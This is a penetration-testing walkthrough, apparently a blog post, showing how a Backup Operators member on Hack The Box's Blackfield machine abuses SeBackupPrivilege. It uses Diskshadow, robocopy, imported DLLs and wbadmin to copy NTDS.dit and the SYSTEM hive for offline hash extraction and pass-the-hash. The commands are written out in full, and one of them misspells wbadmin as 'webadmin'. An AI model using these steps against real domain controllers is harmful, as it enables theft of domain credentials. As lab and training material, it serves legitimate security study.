WINDOWS PRIVILEGE ESCALATION

Once we gain initial access to a system during an internal penetration testing assessment, the next step is to escalate privileges in order to run necessary tools and explore the network effectively. In a Windows environment, one of the common ways to do this is by exploiting a user’s privileges.

Abusing the SeBackupPrivilege is one such way. A user with this privilege can create a full backup of the entire system, including sensitive files like the Security Account Manager (SAM) and the Active Directory database “NT Directory Services. Directory Information Tree” (NTDS.dit).

Then, with that full backup, we can extract the hashes from these files to crack them offline or perform a Pass-the-Hash (PTH) attack to elevate our obtained shell.

In this article, we will discuss how to create system backups using different techniques by utilizing SeBackupPrivilege. We will also look into extracting hashes from these backups to use them for local escalation. We will use Hack The Box’s Blackfield machine to demonstrate the steps.

The Blackfield machine is part of the Active Directory track, which offers a good opportunity to gain hands-on experience with various AD attacks and prepare for the Pro Lab — OffShore.

After gaining access to the machine as a svc_backup user, we examine the user’s permissions by running the whoami /all command. We notice that the user is a member of the Backup Operators group, which has the SeBackupPrivilege and SeRestorePrivilege enabled as part of its privileges.

Since we are a member of the Backup Operators group, we are authorized to create system backups. We will use this to our advantage by creating a backup that includes the NTDS.dit file, from which we can extract the hashes for later use to escalate our privileges.

We will cover three (3) different techniques to achieve that:

Method 1: Diskshadow & Robocopy

The first method involves running Windows built-in utilities Diskshadow and Robocopy. Diskshadow creates copies of a currently used drive, while Robocopy copies files and directories from one location to another.

We cannot copy the system files directly using regular copy commands because they are always running and in use.

To create the live copy, we run the below script that performs a full backup of the C: drive and exposes it as a network drive with the drive letter E:.

Here is the full script and the breakdown of the commands below:

set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

The script starts with enabling the verbose mode to provide more details on the output. Then, it sets the location of the metadata file.

The meta.cab file is created when we create the shadow copy of the drive. It stores information about our shadow copy, such as the creation date and time, the volume’s name, and the copy’s size.

set verbose on
set metadata C:\Windows\Temp\meta.cab

Next, we set the contexts of the backup to be client-accessible and persistent. So, the backups can be accessible to us after the script runs and persistent when we reboot the machine.

set context clientaccessible
set context persistent

Then, the backup command initiates the backup operation, includes the C: drive, and assigns it an alias such as cdrive for reference. We can have any alias name we want.

begin backup
add volume C: alias cdrive

Finally, the create command creates the actual backup, then exposes the C: drive as a network drive with the letter E:and finalizes the operation with the end backup command.

create
expose %cdrive% E:
end backup

After putting together the script, we pass it to the Diskshadow utility to create the shadow copy that will create a snapshot of the drive while the files are in use.

diskshadow /s back_script.txt

When the process is complete, switch to the E: drive and copy the NTDS.dit file using Robocopy to the Temp file created in the C: drive.

cd E:
robocopy /b E:\Windows\ntds . ntds.dit

Next, we get the system registry hive that contains the keys needed to decrypt the NTDS file with the reg save command.

reg save hklm\system c:\temp\system.bak

Then, we download the files locally to our machine to extract the hashes. I used the download command in the Evil-Winrm shell.

download ntds.dit
download system

Method 2: Diskshadow & Dynamic Link Libraries (DLLs)

The second method uses Diskshadow to create a shadow copy and Dynamic Link Libraries (DLLs) to copy the system files as an alternative to Robocopy.

We can use the compiled DLLs in the Giuliano108 repo or compile them locally with Visual Studio. The repo contains two (2) DLLs: SeBackupPrivilegeCmdLets.dll is for validating that the SeBackupPrivilege is enabled, and the SeBackupPrivilegeUtils.dll is for copying the files.

Create the Shadow copy with Diskshadow, as shown in method 1; then, upload the DLLs to the target machine and import them.

Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll

Then, we use the copying function “Copy-FileSeBackupPrivilege” in the SeBackupPrivilegeUtils.dll to copy the NTDS.dit file, and save the system hive for the hash extraction later.

Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
reg save hklm\system c:\temp\system

Method 3: Wbadmin Utility

The Wbadmin utility is used to create and restore backups in Windows environment. To create a backup, use the following command:

wbadmin start backup -quiet -backuptarget:\\dc01\c$\temp -include:c:\windows\ntds

• wbadmin: Invokes the tool.
• start backup: Initiates a backup operation.
• -quiet: Suppresses prompts or messages during the backup process.
• -backuptarget: Specifies the backup target location (\\dc01\c$\temp).
• -include: Specifies file that we want to backup (c:\windows\ntds).

After running the tool, we verify the backup using the get versions command. As seen below, the backup was created in the temp directory \\dc01\C$\temp.

wbadmin get versions

To restore the backup we created, we run the below command

webadmin start recovery -quiet -version:07/26/2021-03:16 -itemtype:file -item:c:\windows\ntds\ntds.dit -recoverytarget:c:\temp -notrestoreacl

• -version: Specifies the backup version from which to recover the file.
• -itemtype:file : Specifies that the item to be recovered is a file.
• -item: Specifies the exact location of the NTDS file to be recovered (c:\windows\ntds\ntds.dit).
• -recoverytarget: Specifies the location where the recovered file should be placed (c:\temp).
• -notrestoreacl: Instructs the recovery process not to restore the ACLs (Access Control Lists) of the recovered file. This means the recovered file will inherit the ACLs of the target location (c:\temp).

After that, we copy the system file for hash extraction later.

reg save hklm\system c:\temp\system